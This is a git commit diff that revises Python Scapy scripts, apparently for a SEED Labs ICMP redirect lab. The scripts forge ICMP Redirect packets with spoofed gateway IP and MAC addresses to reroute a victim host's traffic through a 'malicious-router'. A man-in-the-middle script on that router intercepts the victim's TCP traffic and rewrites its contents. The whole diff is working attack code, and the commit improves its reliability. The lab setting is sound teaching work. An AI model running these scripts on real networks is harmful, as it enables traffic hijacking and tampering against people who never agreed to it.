updated some material
This commit is contained in:
@@ -1,24 +1,34 @@
|
||||
#!/usr/bin/env python3
|
||||
from scapy.all import *
|
||||
from scapy.all import Ether, IP, TCP, get_if_hwaddr, send, sniff
|
||||
|
||||
VICTIM_IP = "10.9.0.5"
|
||||
TARGET_IP = "192.168.60.5"
|
||||
LOCAL_MAC = get_if_hwaddr("eth0")
|
||||
|
||||
|
||||
def spoof_pkt(pkt):
|
||||
# 如果是发往目标 192.168.60.5 的 TCP 数据包
|
||||
if IP in pkt and pkt[IP].dst == '192.168.60.5' and TCP in pkt:
|
||||
newpkt = IP(bytes(pkt[IP]))
|
||||
del(newpkt.chksum)
|
||||
del(newpkt[TCP].payload)
|
||||
del(newpkt[TCP].chksum)
|
||||
if IP not in pkt or TCP not in pkt or pkt[IP].src != VICTIM_IP or pkt[IP].dst != TARGET_IP:
|
||||
return
|
||||
if Ether in pkt and pkt[Ether].dst != LOCAL_MAC:
|
||||
return
|
||||
|
||||
if pkt[TCP].payload:
|
||||
data = pkt[TCP].payload.load
|
||||
print(f"Original data: {data}")
|
||||
# 修改内容,假设名字是 seedlabs -> AAAAAAAA
|
||||
newdata = data.replace(b'seedlabs', b'AAAAAAAA')
|
||||
send(newpkt/newdata, verbose=False)
|
||||
else:
|
||||
send(newpkt, verbose=False)
|
||||
newpkt = IP(bytes(pkt[IP]))
|
||||
del newpkt.chksum
|
||||
del newpkt[TCP].payload
|
||||
del newpkt[TCP].chksum
|
||||
|
||||
# 过滤器只捕获受害者的包,避免拦截自己发出的包导致死循环
|
||||
f = 'tcp and src 10.9.0.5'
|
||||
print("MITM script starting on malicious-router...")
|
||||
sniff(iface='eth0', filter=f, prn=spoof_pkt)
|
||||
if pkt[TCP].payload:
|
||||
data = pkt[TCP].payload.load
|
||||
print(f"Original data: {data}")
|
||||
newdata = data.replace(b"seedlabs", b"AAAAAAAA")
|
||||
send(newpkt / newdata, verbose=False)
|
||||
else:
|
||||
send(newpkt, verbose=False)
|
||||
|
||||
|
||||
print(f"MITM script starting on malicious-router (mac={LOCAL_MAC})...")
|
||||
sniff(
|
||||
iface="eth0",
|
||||
filter=f"tcp and src host {VICTIM_IP} and dst host {TARGET_IP}",
|
||||
prn=spoof_pkt,
|
||||
)
|
||||
|
||||
@@ -1,21 +1,70 @@
|
||||
#!/usr/bin/python3
|
||||
from scapy.all import *
|
||||
|
||||
# ICMP Redirect packet
|
||||
# IP layer: src must be the current gateway, dst is the victim
|
||||
ip = IP(src='10.9.0.11', dst='10.9.0.5')
|
||||
# ICMP layer: type 5 is redirect, code 1 is for host
|
||||
icmp = ICMP(type=5, code=1)
|
||||
# The IP address of the new gateway
|
||||
icmp.gw = '10.9.0.111'
|
||||
|
||||
# The ICMP Redirect packet must contain the original IP packet that triggered it
|
||||
# Victim's IP to the target destination
|
||||
ip2 = IP(src='10.9.0.5', dst='192.168.60.5')
|
||||
|
||||
import argparse
|
||||
import sys
|
||||
import time
|
||||
# Full packet construction: IP/ICMP/original-IP/original-ICMP
|
||||
pkt = ip/icmp/ip2/ICMP()
|
||||
while True:
|
||||
send(pkt, iface='eth0', verbose=True)
|
||||
time.sleep(1)
|
||||
|
||||
from scapy.all import Ether, ICMP, IP, conf, get_if_hwaddr, getmacbyip, sendp
|
||||
|
||||
|
||||
def build_parser():
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Send forged ICMP Redirect packets with L2 spoofing."
|
||||
)
|
||||
parser.add_argument("--victim", default="10.9.0.5")
|
||||
parser.add_argument("--target", default="192.168.60.5")
|
||||
parser.add_argument("--gateway", default="10.9.0.11")
|
||||
parser.add_argument("--new-gateway", default="10.9.0.111")
|
||||
parser.add_argument("--echo-id", type=int, default=0x1234)
|
||||
parser.add_argument("--echo-seq", type=int, default=1)
|
||||
parser.add_argument("--count", type=int, default=20)
|
||||
parser.add_argument("--interval", type=float, default=0.5)
|
||||
return parser
|
||||
|
||||
|
||||
def must_resolve_mac(ip_addr):
|
||||
mac = getmacbyip(ip_addr)
|
||||
if mac is None:
|
||||
print(f"Failed to resolve MAC address for {ip_addr}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
return mac
|
||||
|
||||
|
||||
def main():
|
||||
args = build_parser().parse_args()
|
||||
conf.verb = 0
|
||||
|
||||
victim_mac = must_resolve_mac(args.victim)
|
||||
gateway_mac = must_resolve_mac(args.gateway)
|
||||
attacker_mac = get_if_hwaddr("eth0")
|
||||
|
||||
outer_ip = IP(src=args.gateway, dst=args.victim)
|
||||
redirect = ICMP(type=5, code=1, gw=args.new_gateway)
|
||||
|
||||
# Quote the original packet in the RFC-required minimum form:
|
||||
# original IP header + first 8 bytes of payload.
|
||||
inner = IP(src=args.victim, dst=args.target) / ICMP(
|
||||
type=8, id=args.echo_id, seq=args.echo_seq
|
||||
)
|
||||
quoted = bytes(inner)[:28]
|
||||
|
||||
frame = (
|
||||
Ether(src=gateway_mac, dst=victim_mac)
|
||||
/ outer_ip
|
||||
/ redirect
|
||||
/ quoted
|
||||
)
|
||||
|
||||
print(
|
||||
"Sending forged redirects: "
|
||||
f"gateway_ip={args.gateway}, gateway_mac={gateway_mac}, "
|
||||
f"victim_mac={victim_mac}, attacker_mac={attacker_mac}, "
|
||||
f"quoted_echo_id={args.echo_id}, quoted_echo_seq={args.echo_seq}"
|
||||
)
|
||||
for idx in range(args.count):
|
||||
sendp(frame, iface="eth0", verbose=False)
|
||||
print(f"sent redirect #{idx + 1}")
|
||||
time.sleep(args.interval)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
|
||||
@@ -1,24 +1,6 @@
|
||||
#!/usr/bin/python3
|
||||
from scapy.all import *
|
||||
import time
|
||||
from task1 import main
|
||||
|
||||
# 原始网关是 10.9.0.11
|
||||
# 我们要受害者 (10.9.0.5) 将发往 192.168.60.5 的流量重定向到 10.9.0.111
|
||||
|
||||
# 外层 IP 包:假装是网关发送的
|
||||
ip = IP(src='10.9.0.11', dst='10.9.0.5')
|
||||
# ICMP 重定向 (type=5, code=1: Redirect Host)
|
||||
icmp = ICMP(type=5, code=1)
|
||||
# 新网关
|
||||
icmp.gw = '10.9.0.111'
|
||||
|
||||
# 包含在重定向包中的“触发包”负载
|
||||
# 必须匹配受害者正在发送或刚发送的内容
|
||||
ip2 = IP(src='10.9.0.5', dst='192.168.60.5')
|
||||
# ICMP echo request
|
||||
pkt = ip/icmp/ip2/ICMP()
|
||||
|
||||
print("Sending ICMP Redirect packets...")
|
||||
for i in range(10):
|
||||
send(pkt, iface='eth0', verbose=False)
|
||||
time.sleep(0.5)
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
|
||||
@@ -1,26 +1,41 @@
|
||||
#!/usr/bin/python3
|
||||
from scapy.all import *
|
||||
from scapy.all import Ether, ICMP, IP, get_if_hwaddr, getmacbyip, sendp, sniff
|
||||
|
||||
victim_ip = "10.9.0.5"
|
||||
target_ip = "192.168.60.5"
|
||||
gateway_ip = "10.9.0.11"
|
||||
malicious_router = "10.9.0.111"
|
||||
|
||||
victim_mac = getmacbyip(victim_ip)
|
||||
gateway_mac = getmacbyip(gateway_ip)
|
||||
local_mac = get_if_hwaddr("eth0")
|
||||
|
||||
victim_ip = '10.9.0.5'
|
||||
target_ip = '192.168.60.5'
|
||||
gateway_ip = '10.9.0.11'
|
||||
malicious_router = '10.9.0.111'
|
||||
|
||||
def send_redirect(pkt):
|
||||
if ICMP in pkt and pkt[ICMP].type == 8: # Echo Request
|
||||
print(f"Captured packet from {pkt[IP].src} to {pkt[IP].dst}. Sending redirect...")
|
||||
# 外层 IP 包
|
||||
ip = IP(src=gateway_ip, dst=victim_ip)
|
||||
# ICMP 重定向 (type=5, code=1)
|
||||
icmp = ICMP(type=5, code=1)
|
||||
# 有些 Scapy 版本对 gw 的处理有问题,直接使用其内部字段名或 hex
|
||||
icmp.gw = malicious_router
|
||||
# 负载应该是触发重定向的原始 IP 数据包
|
||||
# 包括 IP 头部和至少 8 字节的原始负载
|
||||
# 这里直接传整个 pkt[IP] 也是可以的
|
||||
redirect_pkt = ip/icmp/pkt[IP]
|
||||
print(f"Packet: {redirect_pkt.summary()}")
|
||||
send(redirect_pkt, iface='eth0', verbose=True)
|
||||
if IP not in pkt or ICMP not in pkt or pkt[ICMP].type != 8:
|
||||
return
|
||||
|
||||
print(f"Sniffing for packets from {victim_ip} to {target_ip}...")
|
||||
sniff(iface='eth0', filter=f"icmp and src {victim_ip} and dst {target_ip}", prn=send_redirect, count=10)
|
||||
print(
|
||||
f"Captured echo request {pkt[IP].src} -> {pkt[IP].dst}; "
|
||||
f"local_mac={local_mac}, victim_mac={victim_mac}, gateway_mac={gateway_mac}"
|
||||
)
|
||||
frame = (
|
||||
Ether(src=gateway_mac, dst=victim_mac)
|
||||
/ IP(src=gateway_ip, dst=victim_ip)
|
||||
/ ICMP(type=5, code=1, gw=malicious_router)
|
||||
/ bytes(pkt[IP])[:28]
|
||||
)
|
||||
sendp(frame, iface="eth0", verbose=False)
|
||||
print("redirect sent")
|
||||
|
||||
|
||||
print(
|
||||
"Sniffing for victim ICMP traffic. "
|
||||
"This only works if the victim's unicast packets are visible on eth0."
|
||||
)
|
||||
sniff(
|
||||
iface="eth0",
|
||||
filter=f"icmp and src {victim_ip} and dst {target_ip}",
|
||||
prn=send_redirect,
|
||||
count=10,
|
||||
)
|
||||
|
||||
Reference in New Issue
Block a user